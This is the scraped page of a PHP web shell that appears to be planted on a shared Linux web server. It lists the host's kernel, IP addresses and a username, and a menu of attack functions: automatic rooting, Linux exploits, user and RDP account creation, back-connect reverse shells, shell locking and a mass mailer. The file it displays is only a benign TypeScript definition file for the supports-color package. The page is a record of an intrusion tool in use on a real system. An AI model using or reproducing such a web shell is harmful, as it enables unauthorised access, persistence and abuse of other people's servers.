Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
supports-color /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.22
KB
-rw-r--r--
package.json
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for supports-color 8.1 // Project: https://github.com/chalk/supports-color // Definitions by: Melvin Groenhoff <https://github.com/mgroenhoff> // Matt Traynham <https://github.com/mtraynham> // Piotr Błażejewicz <https://github.com/peterblazejewicz> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped export namespace supportsColor { interface Level { level: number; hasBasic: boolean; has256: boolean; has16m: boolean; } interface Options { /** * By default it is `true`, which instructs `supportsColor()` to sniff `process.argv` * for the multitude of `--color` flags (see _Info_ below). * If `false`, then `process.argv` is not considered when determining color support. * @default true */ sniffFlags?: boolean | undefined; isTTY?: boolean | undefined; } type SupportsColor = false | Level; } export function supportsColor( stream: { isTTY?: boolean | undefined; }, options?: supportsColor.Options, ): supportsColor.SupportsColor; export const stdout: supportsColor.SupportsColor; export const stderr: supportsColor.SupportsColor;
Close